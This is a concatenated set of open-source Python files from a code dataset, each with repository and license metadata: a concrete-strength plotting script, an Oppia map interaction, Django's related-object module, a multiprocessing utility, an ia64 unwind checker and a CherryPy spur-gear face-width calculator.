import matplotlib
import matplotlib.pyplot as plt
plt.style.use('ggplot')
df = pd.read_csv('concrete.csv')
print df.describe()
# Plot 1
df.plot.scatter(x='cement', y='strength')
plt.suptitle('Cement vs str')
plt.xlabel('Cement')
plt.ylabel('Str')
# Plot 2
df.plot.scatter(x='slag', y='strength')
plt.suptitle('slag vs str')
plt.xlabel('slag')
plt.ylabel('Str')
# Plot 3
df.plot.scatter(x='ash', y='strength')
plt.suptitle('ash vs str')
plt.xlabel('ash')
plt.ylabel('Str')
# Plot 4
df.plot.scatter(x='water', y='strength')
plt.suptitle('water vs str')
plt.xlabel('water')
plt.ylabel('Str')
# Plot 5
df.plot.scatter(x='superplastic', y='strength')
plt.suptitle('superplastic vs str')
plt.xlabel('superplastic')
plt.ylabel('Str')
# Plot 6
df.plot.scatter(x='coarseagg', y='strength')
plt.suptitle('coarseagg vs str')
plt.xlabel('coarseagg')
plt.ylabel('Str')
# Plot 7
df.plot.scatter(x='fineagg', y='strength')
plt.suptitle('fineagg vs str')
plt.xlabel('fineagg')
plt.ylabel('Str')
# Plot 8
df.plot.scatter(x='age', y='strength')
plt.suptitle('age vs str')
plt.xlabel('age')
plt.ylabel('Str')
plt.show() | mit |
sunu/oppia | extensions/interactions/InteractiveMap/InteractiveMap.py | 5 | 2011 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, softwar
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from extensions.interactions import base
class InteractiveMap(base.BaseInteraction):
"""Interaction for pinpointing a location on a map."""
name = 'World Map'
description = 'Allows learners to specify a position on a world map.'
display_mode = base.DISPLAY_MODE_SUPPLEMENTAL
_dependency_ids = ['google_maps']
answer_type = 'CoordTwoDim'
_customization_arg_specs = [{
'name': 'latitude',
'description': 'Starting center latitude (-90 to 90)',
'schema': {
'type': 'float',
'validators': [{
'id': 'is_at_least',
'min_value': -90.0,
}, {
'id': 'is_at_most',
'max_value': 90.0,
}]
},
'default_value': 0.0,
}, {
'name': 'longitude',
'description': 'Starting center longitude (-180 to 180)',
'schema': {
'type': 'float',
'validators': [{
'id': 'is_at_least',
'min_value': -180.0,
}, {
'id': 'is_at_most',
'max_value': 180.0,
}]
},
'default_value': 0.0,
}, {
'name': 'zoom',
'description': 'Starting zoom level (0 shows the entire earth)',
'schema': {
'type': 'float',
},
'default_value': 0.0,
}]
| apache-2.0 |
yati-sagade/RyDyrect | django/db/models/related.py | 231 | 3157 | from django.utils.encoding import smart_unicode
from django.db.models.fields import BLANK_CHOICE_DASH
class BoundRelatedObject(object):
def __init__(self, related_object, field_mapping, original):
self.relation = related_object
self.field_mappings = field_mapping[related_object.name]
def template_name(self):
raise NotImplementedError
def __repr__(self):
return repr(self.__dict__)
class RelatedObject(object):
def __init__(self, parent_model, model, field):
self.parent_model = parent_model
self.model = model
self.opts = model._meta
self.field = field
self.name = '%s:%s' % (self.opts.app_label, self.opts.module_name)
self.var_name = self.opts.object_name.lower()
def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH,
limit_to_currently_related=False):
"""Returns choices with a default blank choices included, for use
as SelectField choices for this field.
Analogue of django.db.models.fields.Field.get_choices, provided
initially for utilisation by RelatedFilterSpec.
"""
first_choice = include_blank and blank_choice or []
queryset = self.model._default_manager.all()
if limit_to_currently_related:
queryset = queryset.complex_filter(
{'%s__isnull' % self.parent_model._meta.module_name: False})
lst = [(x._get_pk_val(), smart_unicode(x)) for x in queryset]
return first_choice + lst
def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
# Defer to the actual field definition for db prep
return self.field.get_db_prep_lookup(lookup_type, value,
connection=connection, prepared=prepared)
def editable_fields(self):
"Get the fields in this class that should be edited inline."
return [f for f in self.opts.fields + self.opts.many_to_many if f.editable and f != self.field]
def __repr__(self):
return "<RelatedObject: %s related to %s>" % (self.name, self.field.name)
def bind(self, field_mapping, original, bound_related_object_class=BoundRelatedObject):
return bound_related_object_class(self, field_mapping, original)
def get_accessor_name(self):
# This method encapsulates the logic that decides what name to give an
# accessor descriptor that retrieves related many-to-one or
# many-to-many objects. It uses the lower-cased object_name + "_set",
# but this can be overridden with the "related_name" option.
if self.field.rel.multiple:
# If this is a symmetrical m2m relation on self, there is no reverse accessor.
if getattr(self.field.rel, 'symmetrical', False) and self.model == self.parent_model:
return None
return self.field.rel.related_name or (self.opts.object_name.lower() + '_set')
else:
return self.field.rel.related_name or (self.opts.object_name.lower())
def get_cache_name(self):
return "_%s_cache" % self.get_accessor_name()
| bsd-3-clause |
Jionglun/-w16b_test | static/Brython3.1.3-20150514-095342/Lib/multiprocessing/util.py | 696 | 9917 | #
# Module providing various facilities to other parts of the package
#
# multiprocessing/util.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
import sys
import functools
import os
import itertools
import weakref
import atexit
import threading # we want threading to install it's
# cleanup function before multiprocessing does
from subprocess import _args_from_interpreter_flags
from multiprocessing.process import current_process, active_children
__all__ = [
'sub_debug', 'debug', 'info', 'sub_warning', 'get_logger',
'log_to_stderr', 'get_temp_dir', 'register_after_fork',
'is_exiting', 'Finalize', 'ForkAwareThreadLock', 'ForkAwareLocal',
'SUBDEBUG', 'SUBWARNING',
]
#
# Logging
#
NOTSET = 0
SUBDEBUG = 5
DEBUG = 10
INFO = 20
SUBWARNING = 25
LOGGER_NAME = 'multiprocessing'
DEFAULT_LOGGING_FORMAT = '[%(levelname)s/%(processName)s] %(message)s'
_logger = None
_log_to_stderr = False
def sub_debug(msg, *args):
if _logger:
_logger.log(SUBDEBUG, msg, *args)
def debug(msg, *args):
if _logger:
_logger.log(DEBUG, msg, *args)
def info(msg, *args):
if _logger:
_logger.log(INFO, msg, *args)
def sub_warning(msg, *args):
if _logger:
_logger.log(SUBWARNING, msg, *args)
def get_logger():
'''
Returns logger used by multiprocessing
'''
global _logger
import logging
logging._acquireLock()
try:
if not _logger:
_logger = logging.getLogger(LOGGER_NAME)
_logger.propagate = 0
logging.addLevelName(SUBDEBUG, 'SUBDEBUG')
logging.addLevelName(SUBWARNING, 'SUBWARNING')
# XXX multiprocessing should cleanup before logging
if hasattr(atexit, 'unregister'):
atexit.unregister(_exit_function)
atexit.register(_exit_function)
else:
atexit._exithandlers.remove((_exit_function, (), {}))
atexit._exithandlers.append((_exit_function, (), {}))
finally:
logging._releaseLock()
return _logger
def log_to_stderr(level=None):
'''
Turn on logging and add a handler which prints to stderr
'''
global _log_to_stderr
import logging
logger = get_logger()
formatter = logging.Formatter(DEFAULT_LOGGING_FORMAT)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger.addHandler(handler)
if level:
logger.setLevel(level)
_log_to_stderr = True
return _logger
#
# Function returning a temp directory which will be removed on exit
#
def get_temp_dir():
# get name of a temp directory which will be automatically cleaned up
if current_process()._tempdir is None:
import shutil, tempfile
tempdir = tempfile.mkdtemp(prefix='pymp-')
info('created temp directory %s', tempdir)
Finalize(None, shutil.rmtree, args=[tempdir], exitpriority=-100)
current_process()._tempdir = tempdir
return current_process()._tempdir
#
# Support for reinitialization of objects when bootstrapping a child process
#
_afterfork_registry = weakref.WeakValueDictionary()
_afterfork_counter = itertools.count()
def _run_after_forkers():
items = list(_afterfork_registry.items())
items.sort()
for (index, ident, func), obj in items:
try:
func(obj)
except Exception as e:
info('after forker raised exception %s', e)
def register_after_fork(obj, func):
_afterfork_registry[(next(_afterfork_counter), id(obj), func)] = obj
#
# Finalization using weakrefs
#
_finalizer_registry = {}
_finalizer_counter = itertools.count()
class Finalize(object):
'''
Class which supports object finalization using weakrefs
'''
def __init__(self, obj, callback, args=(), kwargs=None, exitpriority=None):
assert exitpriority is None or type(exitpriority) is int
if obj is not None:
self._weakref = weakref.ref(obj, self)
else:
assert exitpriority is not None
self._callback = callback
self._args = args
self._kwargs = kwargs or {}
self._key = (exitpriority, next(_finalizer_counter))
self._pid = os.getpid()
_finalizer_registry[self._key] = self
def __call__(self, wr=None,
# Need to bind these locally because the globals can have
# been cleared at shutdown
_finalizer_registry=_finalizer_registry,
sub_debug=sub_debug, getpid=os.getpid):
'''
Run the callback unless it has already been called or cancelled
'''
try:
del _finalizer_registry[self._key]
except KeyError:
sub_debug('finalizer no longer registered')
else:
if self._pid != getpid():
sub_debug('finalizer ignored because different process')
res = None
else:
sub_debug('finalizer calling %s with args %s and kwargs %s',
self._callback, self._args, self._kwargs)
res = self._callback(*self._args, **self._kwargs)
self._weakref = self._callback = self._args = \
self._kwargs = self._key = None
return res
def cancel(self):
'''
Cancel finalization of the object
'''
try:
del _finalizer_registry[self._key]
except KeyError:
pass
else:
self._weakref = self._callback = self._args = \
self._kwargs = self._key = None
def still_active(self):
'''
Return whether this finalizer is still waiting to invoke callback
'''
return self._key in _finalizer_registry
def __repr__(self):
try:
obj = self._weakref()
except (AttributeError, TypeError):
obj = None
if obj is None:
return '<Finalize object, dead>'
x = '<Finalize object, callback=%s' % \
getattr(self._callback, '__name__', self._callback)
if self._args:
x += ', args=' + str(self._args)
if self._kwargs:
x += ', kwargs=' + str(self._kwargs)
if self._key[0] is not None:
x += ', exitprority=' + str(self._key[0])
return x + '>'
def _run_finalizers(minpriority=None):
'''
Run all finalizers whose exit priority is not None and at least minpriority
Finalizers with highest priority are called first; finalizers with
the same priority will be called in reverse order of creation.
'''
if _finalizer_registry is None:
# This function may be called after this module's globals are
# destroyed. See the _exit_function function in this module for more
# notes.
return
if minpriority is None:
f = lambda p : p[0][0] is not None
else:
f = lambda p : p[0][0] is not None and p[0][0] >= minpriority
items = [x for x in list(_finalizer_registry.items()) if f(x)]
items.sort(reverse=True)
for key, finalizer in items:
sub_debug('calling %s', finalizer)
try:
finalizer()
except Exception:
import traceback
traceback.print_exc()
if minpriority is None:
_finalizer_registry.clear()
#
# Clean up on exit
#
def is_exiting():
'''
Returns true if the process is shutting down
'''
return _exiting or _exiting is None
_exiting = False
def _exit_function(info=info, debug=debug, _run_finalizers=_run_finalizers,
active_children=active_children,
current_process=current_process):
# We hold on to references to functions in the arglist due to the
# situation described below, where this function is called after this
# module's globals are destroyed.
global _exiting
if not _exiting:
_exiting = True
info('process shutting down')
debug('running all "atexit" finalizers with priority >= 0')
_run_finalizers(0)
if current_process() is not None:
# We check if the current process is None here because if
# it's None, any call to ``active_children()`` will raise
# an AttributeError (active_children winds up trying to
# get attributes from util._current_process). One
# situation where this can happen is if someone has
# manipulated sys.modules, causing this module to be
# garbage collected. The destructor for the module type
# then replaces all values in the module dict with None.
# For instance, after setuptools runs a test it replaces
# sys.modules with a copy created earlier. See issues
# #9775 and #15881. Also related: #4106, #9205, and
# #9207.
for p in active_children():
if p._daemonic:
info('calling terminate() for daemon %s', p.name)
p._popen.terminate()
for p in active_children():
info('calling join() for process %s', p.name)
p.join()
debug('running the remaining "atexit" finalizers')
_run_finalizers()
atexit.register(_exit_function)
#
# Some fork aware types
#
class ForkAwareThreadLock(object):
def __init__(self):
self._reset()
register_after_fork(self, ForkAwareThreadLock._reset)
def _reset(self):
self._lock = threading.Lock()
self.acquire = self._lock.acquire
self.release = self._lock.release
class ForkAwareLocal(threading.local):
def __init__(self):
register_after_fork(self, lambda obj : obj.__dict__.clear())
def __reduce__(self):
return type(self), ()
| agpl-3.0 |
andrewz1/kernel.tf300tg | arch/ia64/scripts/unwcheck.py | 13143 | 1714 | #!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
| gpl-2.0 |
40223222/40223222 | gear.py | 204 | 19237 | #@+leo-ver=5-thin
#@+node:office.20150407074720.1: * @file gear.py
#@@language python
#@@tabwidth -4
#@+<<declarations>>
#@+node:office.20150407074720.2: ** <<declarations>> (application)
#@@language python
import cherrypy
import os
import sys
# 這個程式要計算正齒輪的齒面寬, 資料庫連結希望使用 pybean 與 SQLite
# 導入 pybean 模組與所要使用的 Store 及 SQLiteWriter 方法
from pybean import Store, SQLiteWriter
import math
# 確定程式檔案所在目錄, 在 Windows 有最後的反斜線
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# 將所在目錄設為系統搜尋目錄
sys.path.append(_curdir)
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# while program is executed in OpenShift
download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
# while program is executed in localhost
download_root_dir = _curdir + "/local_data/"
data_dir = _curdir + "/local_data/"
# 這是 Gear 設計資料表的定義
'''
lewis.db 中有兩個資料表, steel 與 lewis
CREATE TABLE steel (
serialno INTEGER,
unsno TEXT,
aisino TEXT,
treatment TEXT,
yield_str INTEGER,
tensile_str INTEGER,
stretch_ratio INTEGER,
sectional_shr INTEGER,
brinell INTEGER
);
CREATE TABLE lewis (
serialno INTEGER PRIMARY KEY
NOT NULL,
gearno INTEGER,
type1 NUMERIC,
type4 NUMERIC,
type3 NUMERIC,
type2 NUMERIC
);
'''
#@-<<declarations>>
#@+others
#@+node:office.20150407074720.3: ** class Gear
class Gear(object):
#@+others
#@+node:office.20150407074720.4: *3* __init__
def __init__(self):
# hope to create downloads and images directories
if not os.path.isdir(download_root_dir+"downloads"):
try:
os.makedirs(download_root_dir+"downloads")
except:
print("mkdir error")
if not os.path.isdir(download_root_dir+"images"):
try:
os.makedirs(download_root_dir+"images")
except:
print("mkdir error")
if not os.path.isdir(download_root_dir+"tmp"):
try:
os.makedirs(download_root_dir+"tmp")
except:
print("mkdir error")
#@+node:office.20150407074720.5: *3* default
@cherrypy.expose
def default(self, attr='default', *args, **kwargs):
raise cherrypy.HTTPRedirect("/")
#@+node:office.20150407074720.6: *3* index
# 各組利用 index 引導隨後的程式執行
@cherrypy.expose
def index(self, *args, **kwargs):
# 進行資料庫檔案連結, 並且取出所有資料
try:
# 利用 Store 建立資料庫檔案對應物件, 並且設定 frozen=True 表示不要開放動態資料表的建立
# 因為程式以 application 所在目錄執行, 因此利用相對目錄連結 lewis.db 資料庫檔案
SQLite連結 = Store(SQLiteWriter(_curdir+"/lewis.db", frozen=True))
#material = SQLite連結.find_one("steel","serialno = ?",[序號])
# str(SQLite連結.count("steel")) 將傳回 70, 表示資料庫中有 70 筆資料
material = SQLite連結.find("steel")
# 所傳回的 material 為 iterator
'''
outstring = ""
for material_item in material:
outstring += str(material_item.serialno) + ":" + material_item.unsno + "_" + material_item.treatment + "<br />"
return outstring
'''
except:
return "抱歉! 資料庫無法連線<br />"
outstring = '''
<form id=entry method=post action="gear_width">
請填妥下列參數,以完成適當的齒尺寸大小設計。<br />
馬達馬力:<input type=text name=horsepower id=horsepower value=100 size=10>horse power<br />
馬達轉速:<input type=text name=rpm id=rpm value=1120 size=10>rpm<br />
齒輪減速比: <input type=text name=ratio id=ratio value=4 size=10><br />
齒形:<select name=toothtype id=toothtype>
<option value=type1>壓力角20度,a=0.8,b=1.0
<option value=type2>壓力角20度,a=1.0,b=1.25
<option value=type3>壓力角25度,a=1.0,b=1.25
<option value=type4>壓力角25度,a=1.0,b=1.35
</select><br />
安全係數:<input type=text name=safetyfactor id=safetyfactor value=3 size=10><br />
齒輪材質:<select name=material_serialno id=material_serialno>
'''
for material_item in material:
outstring += "<option value=" + str(material_item.serialno) + ">UNS - " + \
material_item.unsno + " - " + material_item.treatment
outstring += "</select><br />"
outstring += "小齒輪齒數:<input type=text name=npinion id=npinion value=18 size=10><br />"
outstring += "<input type=submit id=submit value=進行運算>"
outstring += "</form>"
return outstring
#@+node:office.20150407074720.7: *3* interpolation
@cherrypy.expose
def interpolation(self, small_gear_no=18, gear_type=1):
SQLite連結 = Store(SQLiteWriter(_curdir+"/lewis.db", frozen=True))
# 使用內插法求值
# 找出比目標齒數大的其中的最小的,就是最鄰近的大值
lewis_factor = SQLite連結.find_one("lewis","gearno > ?",[small_gear_no])
if(gear_type == 1):
larger_formfactor = lewis_factor.type1
elif(gear_type == 2):
larger_formfactor = lewis_factor.type2
elif(gear_type == 3):
larger_formfactor = lewis_factor.type3
else:
larger_formfactor = lewis_factor.type4
larger_toothnumber = lewis_factor.gearno
# 找出比目標齒數小的其中的最大的,就是最鄰近的小值
lewis_factor = SQLite連結.find_one("lewis","gearno < ? order by gearno DESC",[small_gear_no])
if(gear_type == 1):
smaller_formfactor = lewis_factor.type1
elif(gear_type == 2):
smaller_formfactor = lewis_factor.type2
elif(gear_type == 3):
smaller_formfactor = lewis_factor.type3
else:
smaller_formfactor = lewis_factor.type4
smaller_toothnumber = lewis_factor.gearno
calculated_factor = larger_formfactor + (small_gear_no - larger_toothnumber) * (larger_formfactor - smaller_formfactor) / (larger_toothnumber - smaller_toothnumber)
# 只傳回小數點後五位數
return str(round(calculated_factor, 5))
#@+node:office.20150407074720.8: *3* gear_width
# 改寫為齒面寬的設計函式
@cherrypy.expose
def gear_width(self, horsepower=100, rpm=1000, ratio=4, toothtype=1, safetyfactor=2, material_serialno=1, npinion=18):
SQLite連結 = Store(SQLiteWriter(_curdir+"/lewis.db", frozen=True))
outstring = ""
# 根據所選用的齒形決定壓力角
if(toothtype == 1 or toothtype == 2):
壓力角 = 20
else:
壓力角 = 25
# 根據壓力角決定最小齒數
if(壓力角== 20):
最小齒數 = 18
else:
最小齒數 = 12
# 直接設最小齒數
if int(npinion) <= 最小齒數:
npinion = 最小齒數
# 大於400的齒數則視為齒條(Rack)
if int(npinion) >= 400:
npinion = 400
# 根據所選用的材料查詢強度值
# 由 material之序號查 steel 表以得材料之降伏強度S單位為 kpsi 因此查得的值要成乘上1000
# 利用 Store 建立資料庫檔案對應物件, 並且設定 frozen=True 表示不要開放動態資料表的建立
#SQLite連結 = Store(SQLiteWriter("lewis.db", frozen=True))
# 指定 steel 資料表
steel = SQLite連結.new("steel")
# 資料查詢
#material = SQLite連結.find_one("steel","unsno=? and treatment=?",[unsno, treatment])
material = SQLite連結.find_one("steel","serialno=?",[material_serialno])
# 列出 steel 資料表中的資料筆數
#print(SQLite連結.count("steel"))
#print (material.yield_str)
strengthstress = material.yield_str*1000
# 由小齒輪的齒數與齒形類別,查詢lewis form factor
# 先查驗是否有直接對應值
on_table = SQLite連結.count("lewis","gearno=?",[npinion])
if on_table == 1:
# 直接進入設計運算
#print("直接運算")
#print(on_table)
lewis_factor = SQLite連結.find_one("lewis","gearno=?",[npinion])
#print(lewis_factor.type1)
# 根據齒形查出 formfactor 值
if(toothtype == 1):
formfactor = lewis_factor.type1
elif(toothtype == 2):
formfactor = lewis_factor.type2
elif(toothtype == 3):
formfactor = lewis_factor.type3
else:
formfactor = lewis_factor.type4
else:
# 沒有直接對應值, 必須進行查表內插運算後, 再執行設計運算
#print("必須內插")
#print(interpolation(npinion, gear_type))
formfactor = self.interpolation(npinion, toothtype)
# 開始進行設計運算
ngear = int(npinion) * int(ratio)
# 重要的最佳化設計---儘量用整數的diametralpitch
# 先嘗試用整數算若 diametralpitch 找到100 仍無所獲則改用 0.25 作為增量再不行則宣告 fail
counter = 0
i = 0.1
facewidth = 0
circularpitch = 0
while (facewidth <= 3 * circularpitch or facewidth >= 5 * circularpitch):
diametralpitch = i
#circularpitch = 3.14159/diametralpitch
circularpitch = math.pi/diametralpitch
pitchdiameter = int(npinion)/diametralpitch
#pitchlinevelocity = 3.14159*pitchdiameter*rpm/12
pitchlinevelocity = math.pi*pitchdiameter * float(rpm)/12
transmittedload = 33000*float(horsepower)/pitchlinevelocity
velocityfactor = 1200/(1200 + pitchlinevelocity)
# formfactor is Lewis form factor
# formfactor need to get from table 13-3 and determined ty teeth number and type of tooth
# formfactor = 0.293
# 90 is the value get from table corresponding to material type
facewidth = transmittedload*diametralpitch*float(safetyfactor)/velocityfactor/formfactor/strengthstress
if(counter>5000):
outstring += "超過5000次的設計運算,仍無法找到答案!<br />"
outstring += "可能所選用的傳遞功率過大,或無足夠強度的材料可以使用!<br />"
# 離開while迴圈
break
i += 0.1
counter += 1
facewidth = round(facewidth, 4)
if(counter<5000):
# 先載入 cube 程式測試
#outstring = self.cube_weblink()
# 再載入 gear 程式測試
outstring = self.gear_weblink()
outstring += "進行"+str(counter)+"次重複運算後,得到合用的facewidth值為:"+str(facewidth)
return outstring
#@+node:office.20150407074720.9: *3* cube_weblink
@cherrypy.expose
def cube_weblink(self):
outstring = '''<script type="text/javascript" src="/static/weblink/pfcUtils.js"></script>
<script type="text/javascript" src="/static/weblink/wl_header.js">
document.writeln ("Error loading Pro/Web.Link header!");
</script>
<script type="text/javascript" language="JavaScript">
// 若第三輸入為 false, 表示僅載入 session, 但是不顯示
// ret 為 model open return
var ret = document.pwl.pwlMdlOpen("cube.prt", "v:/tmp", false);
if (!ret.Status) {
alert("pwlMdlOpen failed (" + ret.ErrorCode + ")");
}
//將 ProE 執行階段設為變數 session
var session = pfcGetProESession();
// 在視窗中打開零件檔案, 並且顯示出來
var window = session.OpenFile(pfcCreate("pfcModelDescriptor").CreateFromFileName("cube.prt"));
var solid = session.GetModel("cube.prt",pfcCreate("pfcModelType").MDL_PART);
var length,width,myf,myn,i,j,volume,count,d1Value,d2Value;
// 將模型檔中的 length 變數設為 javascript 中的 length 變數
length = solid.GetParam("a1");
// 將模型檔中的 width 變數設為 javascript 中的 width 變數
width = solid.GetParam("a2");
//改變零件尺寸
//myf=20;
//myn=20;
volume=0;
count=0;
try
{
// 以下採用 URL 輸入對應變數
//createParametersFromArguments ();
// 以下則直接利用 javascript 程式改變零件參數
for(i=0;i<=5;i++)
{
//for(j=0;j<=2;j++)
//{
myf=20.0;
myn=10.0+i*0.5;
// 設定變數值, 利用 ModelItem 中的 CreateDoubleParamValue 轉換成 Pro/Web.Link 所需要的浮點數值
d1Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myf);
d2Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myn);
// 將處理好的變數值, 指定給對應的零件變數
length.Value = d1Value;
width.Value = d2Value;
//零件尺寸重新設定後, 呼叫 Regenerate 更新模型
solid.Regenerate(void null);
//利用 GetMassProperty 取得模型的質量相關物件
properties = solid.GetMassProperty(void null);
//volume = volume + properties.Volume;
volume = properties.Volume;
count = count + 1;
alert("執行第"+count+"次,零件總體積:"+volume);
// 將零件存為新檔案
var newfile = document.pwl.pwlMdlSaveAs("cube.prt", "v:/tmp", "cube"+count+".prt");
if (!newfile.Status) {
alert("pwlMdlSaveAs failed (" + newfile.ErrorCode + ")");
}
//} // 內圈 for 迴圈
} //外圈 for 迴圈
//alert("共執行:"+count+"次,零件總體積:"+volume);
//alert("零件體積:"+properties.Volume);
//alert("零件體積取整數:"+Math.round(properties.Volume));
}
catch(err)
{
alert ("Exception occurred: "+pfcGetExceptionType (err));
}
</script>
'''
return outstring
#@+node:office.20150407074720.10: *3* gear_weblink
@cherrypy.expose
def gear_weblink(self, facewidth=5, n=18):
outstring = '''<script type="text/javascript" src="/static/weblink/pfcUtils.js"></script>
<script type="text/javascript" src="/static/weblink/wl_header.js">// <![CDATA[
document.writeln ("Error loading Pro/Web.Link header!");
// ]]></script>
<script type="text/javascript" language="JavaScript">// <![CDATA[
if (!pfcIsWindows()) netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
// 若第三輸入為 false, 表示僅載入 session, 但是不顯示
// ret 為 model open return
var ret = document.pwl.pwlMdlOpen("gear.prt", "v:/", false);
if (!ret.Status) {
alert("pwlMdlOpen failed (" + ret.ErrorCode + ")");
}
//將 ProE 執行階段設為變數 session
var session = pfcGetProESession();
// 在視窗中打開零件檔案, 並且顯示出來
var window = session.OpenFile(pfcCreate("pfcModelDescriptor").CreateFromFileName("gear.prt"));
var solid = session.GetModel("gear.prt",pfcCreate("pfcModelType").MDL_PART);
var length,width,myf,myn,i,j,volume,count,d1Value,d2Value;
// 將模型檔中的 length 變數設為 javascript 中的 length 變數
length = solid.GetParam("n");
// 將模型檔中的 width 變數設為 javascript 中的 width 變數
width = solid.GetParam("face_width");
//改變零件尺寸
//myf=20;
//myn=20;
volume=0;
count=0;
try
{
// 以下採用 URL 輸入對應變數
//createParametersFromArguments ();
// 以下則直接利用 javascript 程式改變零件參數
for(i=0;i<=5;i++)
{
//for(j=0;j<=2;j++)
//{
myf=25+i*2;
myn=10.0+i*0.5;
// 設定變數值, 利用 ModelItem 中的 CreateDoubleParamValue 轉換成 Pro/Web.Link 所需要的浮點數值
//d1Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myf);
d1Value = pfcCreate ("MpfcModelItem").CreateIntParamValue(myf);
d2Value = pfcCreate ("MpfcModelItem").CreateDoubleParamValue(myn);
// 將處理好的變數值, 指定給對應的零件變數
length.Value = d1Value;
width.Value = d2Value;
//零件尺寸重新設定後, 呼叫 Regenerate 更新模型
solid.Regenerate(void null);
//利用 GetMassProperty 取得模型的質量相關物件
properties = solid.GetMassProperty(void null);
//volume = volume + properties.Volume;
volume = properties.Volume;
count = count + 1;
alert("執行第"+count+"次,零件總體積:"+volume);
// 將零件存為新檔案
var newfile = document.pwl.pwlMdlSaveAs("gear.prt", "v:/", "mygear_"+count+".prt");
if (!newfile.Status) {
alert("pwlMdlSaveAs failed (" + newfile.ErrorCode + ")");
}
//} // 內圈 for 迴圈
} //外圈 for 迴圈
//alert("共執行:"+count+"次,零件總體積:"+volume);
//alert("零件體積:"+properties.Volume);
//alert("零件體積取整數:"+Math.round(properties.Volume));
}
catch(err)
{
alert ("Exception occurred: "+pfcGetExceptionType (err));
}
// ]]></script>
'''
return outstring
#@-others
#@-others
root = Gear()
# setup static, images and downloads directories
application_conf = {
'/static':{
'tools.staticdir.on': True,
'tools.staticdir.dir': _curdir+"/static"},
'/images':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/images"},
'/downloads':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/downloads"}
}
# if inOpenshift ('OPENSHIFT_REPO_DIR' exists in environment variables) or not inOpenshift
if __name__ == '__main__':
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# operate in OpenShift
application = cherrypy.Application(root, config = application_conf)
else:
# operate in localhost
cherrypy.quickstart(root, config = application_conf)
#@-leo
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.